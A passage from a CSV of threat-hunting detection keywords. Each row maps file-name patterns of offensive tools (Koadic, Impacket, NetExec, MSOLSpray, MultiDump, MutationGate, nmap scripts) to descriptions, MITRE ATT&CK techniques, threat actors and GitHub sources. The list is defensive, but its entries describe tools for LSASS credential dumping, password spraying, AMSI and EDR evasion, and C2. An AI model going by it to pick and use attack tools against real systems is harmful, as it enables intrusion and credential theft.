TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","8932" "*/MsgKitTestTool/*",".{0,1000}\/MsgKitTestTool\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","N/A","2","161","41","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z","8933" "*/Mshikaki.git*",".{0,1000}\/Mshikaki\.git.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. 
Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","8934" "*/mshta.cmd*",".{0,1000}\/mshta\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8935" "*/mshtajs.cmd*",".{0,1000}\/mshtajs\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8936" "*/msi_search.ps1*",".{0,1000}\/msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","8937" "*/msi-search.git*",".{0,1000}\/msi\-search\.git.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","8938" "*/msLDAPDump*",".{0,1000}\/msLDAPDump.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in 
Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","8939" "*/msol.py*",".{0,1000}\/msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8940" "*/MSOLSpray*",".{0,1000}\/MSOLSpray.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","8941" "*/msrpc-enum.nse*",".{0,1000}\/msrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8942" "*/MSSprinkler.git*",".{0,1000}\/MSSprinkler\.git.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. 
It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","8943" "*/mssprinkler.ps1*",".{0,1000}\/mssprinkler\.ps1.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","8944" "*/mssql_priv.py*",".{0,1000}\/mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8945" "*/ms-sql-brute.nse*",".{0,1000}\/ms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8946" "*/mssqlclient.py*",".{0,1000}\/mssqlclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8947" "*/ms-sql-config.nse*",".{0,1000}\/ms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8948" "*/ms-sql-dac.nse*",".{0,1000}\/ms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8949" "*/ms-sql-dump-hashes.nse*",".{0,1000}\/ms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8950" "*/ms-sql-empty-password.nse*",".{0,1000}\/ms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8951" "*/mssqlexec.py*",".{0,1000}\/mssqlexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","8952" "*/ms-sql-hasdbaccess.nse*",".{0,1000}\/ms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8953" "*/ms-sql-info.nse*",".{0,1000}\/ms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8954" "*/mssqlinstance.py*",".{0,1000}\/mssqlinstance\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8955" "*/ms-sql-ntlm-info.nse*",".{0,1000}\/ms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8956" "*/mssqlproxy.git*",".{0,1000}\/mssqlproxy\.git.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","8957" "*/ms-sql-query.nse*",".{0,1000}\/ms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8958" "*/ms-sql-tables.nse*",".{0,1000}\/ms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8959" "*/ms-sql-xp-cmdshell.nse*",".{0,1000}\/ms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8960" "*/mstscfox.dll*",".{0,1000}\/mstscfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","8961" "*/mtrace.nse*",".{0,1000}\/mtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8962" "*/mtth-bfft/adeleg/releases*",".{0,1000}\/mtth\-bfft\/adeleg\/releases.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","8963" "*/MultiDump.exe*",".{0,1000}\/MultiDump\.exe.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - 
TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","8964" "*/MultiDump.exe*",".{0,1000}\/MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","8965" "*/MultiDump.git*",".{0,1000}\/MultiDump\.git.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","8966" "*/MultiPotato.git*",".{0,1000}\/MultiPotato\.git.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","8967" "*/multi-user.target.wants/tor.service*",".{0,1000}\/multi\-user\.target\.wants\/tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8968" "*/murmur-version.nse*",".{0,1000}\/murmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8969" "*/mushishi.h*",".{0,1000}\/mushishi\.h.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8970" "*/MutationGate.git*",".{0,1000}\/MutationGate\.git.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","8971" "*/mysql-audit.nse*",".{0,1000}\/mysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8972" "*/mysql-brute.nse*",".{0,1000}\/mysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8973" "*/mysql-databases.nse*",".{0,1000}\/mysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8974" "*/mysql-dump-hashes.nse*",".{0,1000}\/mysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8975" "*/mysql-empty-password.nse*",".{0,1000}\/mysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8976" "*/mysql-enum.nse*",".{0,1000}\/mysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8977" "*/mysql-info.nse*",".{0,1000}\/mysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8978" "*/mysql-query.nse*",".{0,1000}\/mysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8979" "*/mysql-users.nse*",".{0,1000}\/mysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8980" "*/mysql-variables.nse*",".{0,1000}\/mysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8981" "*/mysql-vuln-cve2012-2122.nse*",".{0,1000}\/mysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
